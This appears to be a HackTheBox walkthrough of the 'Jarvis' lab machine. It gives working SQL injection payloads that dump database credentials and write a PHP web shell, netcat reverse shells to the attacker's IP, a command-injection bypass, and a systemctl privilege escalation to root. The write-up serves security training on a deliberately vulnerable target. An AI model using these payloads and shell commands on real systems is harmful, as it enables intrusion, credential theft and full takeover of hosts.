Jarvis
This is a medium difficulty Linux machine from HackTheBox created by manulqwerty and Gh0spp7. In this scenario, my IP is 10.10.14.56 and the target’s IP is 10.129.16.167
Gathering Information
Before doing anything, always start using ping to see if this is working
ping -c 1 10.129.16.167
Using nmap, we are going to Scan all open ports (-p- –open) with the highest speed (T5) without DNS resolution (-n), if you want more speed, you can use nmap -p- -sS –min-rate 5000 --open -vvv -n -Pn 10.129.16.167, suggestion by S4vitaar.
nmap -p- --open -T5 -v -n 10.129.16.167
Now we want to gather aditional information by using nmap’s default scripts {-sC} with detailed versions {-sV}
nmap -sC -sV -p 22,80,64999 10.129.16.167
The important information is, port 80 http open, there is a website working using Apache, and in the port 64999 there is another website, we need more details of boths.
whatweb http://10.129.16.167
whatweb http://10.129.16.167:64999
From both, the relevant information is { Email : supersecurehotel@logger.htb }, now we are going to open the browser and check the website, to explore and check if there is a vulnerable URL.
Browser: http://10.129.16.167
If you pick a room, you will see that the URL has a modifiable parameter to explore each room type, let’s try with two thing, first, what happen if you use an invalid number, and then try SQL Injection by adding ” or 1=1 -- -” at the URL.
Browser http://10.129.16.167/room.php?cod=-1 or 1=1 -- -
This one show information, it is a good signal
Browser: http://10.129.16.167/room.php?cod=-1 order by 1-- -
Tried with order by from 1 to 9, but nothing happens.
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,3,4,5,6,7-- -
It shows information if you try by selecting every column until 7.
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,NULL,4,5,6,7-- -
Ok, there is no doubt that this website is vulnerable to SQL Injection, now we are going to test what kind if information we can gain from it.
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,”test”,4,5,6,7-- -
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,database(),4,5,6,7-- -
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,version(),4,5,6,7-- -
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,user(),4,5,6,7-- -
http://10.129.16.167/room.php?cod=-1 union select 1,2,load_file(“/etc/passwd”),4,5,6,7-- -
Press CTRL + U to visualize the information in a friendlier format
In some cases, many string are in a black list, so you can use echo “/etc/passwd” | tr -d ‘\n’ | xxd -ps and paste the output with 0x to avoid these situation, the result will be like: http://10.129.16.167/room.php?cod=-1 union select 1,2,load_file(“0x2f6574632f706173737764”),4,5,6,7-- -
Exploitation
Brow: http://10.129.16.167/room.php?cod=-1 union select 1,2,schema_name,4,5,6,7 from information_schema.schemata limit 0,1-- -
Here you have to test with other limits, like limit 1,1 or 2,1 or ..., because the row only allows one word, or use the command group_concat(schema_name)
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,table_name,4,5,6,7 from information_schema.tables where table_schema=”hotel” limit 0,1-- -
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=”hotel” and table_name=”room” limit 0,1-- -
From this table, we can get the information of every room, you can use sqlmap to get the same information, details at the bottom.
Browser: http://10.129.16.167/room.php?cod=-1 union select 1,2,group_concat(User,0x3a,Password),4,5,6,7 from mysql.user-- -
This information is relevant, now we have the credentials of the administrator, but we have to decrypt it {DBadmin:*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0}
Browser: https://crackstation.net/
If the hash is more complex and it's not in crackstation.net, you can use at your terminal the command hashid and hash-identifier to get the type, and then hashcat -m 300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt, at hash.txt it's the target hash and -m is "mode", 300 = MySQL4.1
MACHINE RESET - NEW IP (10.129.212.38)
Now that we have the username and password of the administrator, we need a place to login, and nmap can help us with it.
nmap –script http-enum -p80 10.129.212.38
PhpMyAdmin is an important place to test the new user and password, open your browser and go to http://10.129.212.38/phpmyadmin/
This is extremely important, we can use SQL queries to get information about the host. Example of what we can do:
Browser: http://10.129.212.38/datatest.txt
But enough exploration, now that we have admin permission we can do the following step to connect to the machine
Browser: http://10.129.212.38/room.php?cod=-1 union select 1,2,”<?php system(‘whoami’); ?>”,4,5,6,7 into outfile “/var/www/html/testing.php”-- -
Browser: http://10.129.212.38/testing.php
We can execute commands, so we are going to create a reverse shell by using RCE.
Browser: http://10.129.212.38/room.php?cod=-1 union select 1,2,”<?php system($_REQUEST[‘cmd’]); ?>”,4,5,6,7 into outfile “/var/www/html/CMD.php”-- -
Browser: http://10.129.212.38/CMD.php
The slot 3 disappeared, and now we can control the output with adding ?cmd=COMMAND at the url
Browser: http://10.129.212.38/CMD.php?cmd=whoami
So, now we want to control with a bash terminal, we need to do two steps.
nc -nlvt 443Browser: http://10.129.212.38/CMD.php?cmd=which nc
To check if exist
Browser: http://10.129.212.38/CMD.php?cmd=nc -e /bin/bash 10.10.14.56 443
We are in, so now we need only an TTY treatment to have a functional shell with shortcuts.
cd /home/pepper
ls -l
id
sudo -l
We are user www-data, a simple guess, But with the current user we have all the access to the file simpler.py
sudo -u pepper /var/www/Admin-Utilities/simpler.py
vi pepper /var/www/Admin-Utilities/simpler.py
Looks like a test and defense system, and the section of the image, looks like a simple exploitable function, first we need to create an script file.
cd /tmp/
vi reverse.sh#!/bin/bash
nc -e /bin/bash 10.10.14.56 443chmod +x reverse.shNow open a new Local Terminal, because the file reverse.sh will connect to that terminal
nc -nlvp 443sudo -u pepper /var/www/Admin-Utilities/simpler.py -p$(bash /tmp/reverse.sh)
Now the second terminal is a new Victim-Bash with the user Pepper, follow the same tty treatment.
cd
ls
cat user.txt
Privileges Scalation
For Privileges Scalation, a good practice is to find a custom command or something weird to abuse.
cd ..
cd ..
id
find \-perm -4000 2>/dev/null
By executing this command from the root folder, you can see the files with high privileges, in this case, systemctl is our target. With this we can restart the system with an added command.
cd privesc
cp /tmp/reverse.sh privesc.shRemember to modify the file privesc.sh to the port 444, we don’t want to interrupt the current working port.
nano privesc.service
Open a new terminal, and prepare to connect with: nc -nlvt 444
nc -nlvt 444systemctl link /home/pepper/privesc/privesc.service
systemctl enable –now /home/pepper/privesc/privesc.service
Now you are connected as root.
/dev/null -c bash
ls
cd root
ls
cat root.txt
Alternative: SQLmap
At the SQL step, another option is to use sqlmap, first get the cookie from the website.
sqlmap -u http://10.129.16.167/room.php?cod=1 --cookie=’PHPSESSID=sc0us610ooevshi902rqdq98d4′ --dbs
sqlmap -u http://10.129.16.167/room.php?cod=1 --cookie=’PHPSESSID=sc0us610ooevshi902rqdq98d4′ -D hotel -tables
sqlmap -u http://10.129.16.167/room.php?cod=1 --cookie=’PHPSESSID=sc0us610ooevshi902rqdq98d4′ -D hotel -T room --dump
Now, go to that location and see the file or move to your current location with: mv /home/robertoalfaro/.local/share/sqlmap/output/10.129.16.167/dump/hotel/room.csv .
You can do the same to get the credentials at the database named “mySQL”
Last updated